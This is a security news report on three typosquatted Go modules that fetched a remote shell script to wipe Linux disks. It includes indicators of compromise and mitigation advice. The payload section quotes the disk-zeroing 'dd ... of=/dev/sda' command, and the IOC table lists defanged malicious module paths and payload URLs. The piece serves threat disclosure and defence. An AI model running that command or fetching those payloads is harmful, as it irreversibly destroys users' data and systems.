Security researchers uncovered a highly destructive supply-chain attack targeting the Go programming ecosystem.
Threat actors infiltrated the software supply chain by publishing three malicious Go modules-prototransform
, go-mcp
, and tlsproxy
-to popular public repositories.
These modules, camouflaged under legitimate-sounding names and obfuscated with advanced array-based string manipulation, evaded initial detection and facilitated the silent deployment of disk-wiping payloads against Linux-based systems.
Threat Methodology
The attackers leveraged Go’s inherently decentralized package import system, where developers freely source modules directly from GitHub repositories without central gatekeeping or namespace validation.

This structure enabled the perpetrators to craft module names closely resembling widely trusted packages, tricking developers into integrating malicious code into production environments.
Once included, the modules executed obfuscated Go routines specifically designed to target Linux hosts, dynamically retrieving and launching remote shell scripts.
Payload Analysis
Upon execution, the modules connected to attacker-controlled servers to fetch a shell script known as done.sh
.
This script deployed a devastating command:dd if=/dev/zero of=/dev/sda bs=1M conv=fsync && sync
This operation zeroed the contents of /dev/sda
, the primary disk on Linux systems, resulting in irreversible destruction of the filesystem, system software, and all organizational data.
The overwriting process rendered affected systems unbootable, with no chance for recovery through conventional forensic means.
This attack demonstrates the escalating risk present in open-source supply chains.
Affected organizations faced instant and complete data loss, catastrophic operational outages, and severe financial and reputational harm.
The sophistication of the obfuscation and namespace mimicry highlights the danger of implicit trust in publicly sourced code, particularly in rapidly evolving ecosystems like Go where over two million modules are in circulation.
Immediate mitigation involves thorough dependency audits, implementation of automated code scanning tools, and integration of continuous monitoring solutions capable of flagging obfuscated or suspicious behaviors in third-party packages.
Security vendors, such as Socket, provide tooling to scan and block potentially malicious modules before integration into official codebases.
Hardened developer education, layered approval processes, and explicit validation of third-party sources are all essential for maintaining resilient supply-chain defense.
The uncovered Go-based disk-wiper campaign is a stark warning for the global developer community: supply-chain compromise remains a top-tier threat, capable of deploying irreversible, large-scale destruction with little warning.
As attackers exploit trust and systemic ambiguity, evolving security and governance practices must be prioritized to safeguard both organizations and the wider software ecosystem.
Indicators of Compromise (IOCs)
IOC Type | Value | Status |
---|---|---|
Malicious Module | github[.]com/truthfulpharm/prototransform | Active |
Malicious Module | github[.]com/blankloggia/go-mcp | Active |
Malicious Module | github[.]com/steelpoor/tlsproxy | Active |
Payload URL | https://vanartest[.]website/storage/de373d0df/a31546bf | Active |
Payload URL | https://kaspamirror[.]icu/storage/de373d0df/a31546bf | Offline |
Payload URL | http://147.45.44[.]41/storage/de373d0df/ccd7b46d | Offline |
MITRE ATT&CK | T1195 – Supply Chain Compromise | Confirmed |
MITRE ATT&CK | T1485 – Data Destruction (Disk Wiper) | Confirmed |
MITRE ATT&CK | T1027 – Obfuscated Files or Information | Confirmed |
MITRE ATT&CK | T1059.004 – Command and Scripting Interpreter (Unix Shell) | Confirmed |
MITRE ATT&CK | T1036 – Masquerading (Namespace Typosquatting) | Confirmed |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates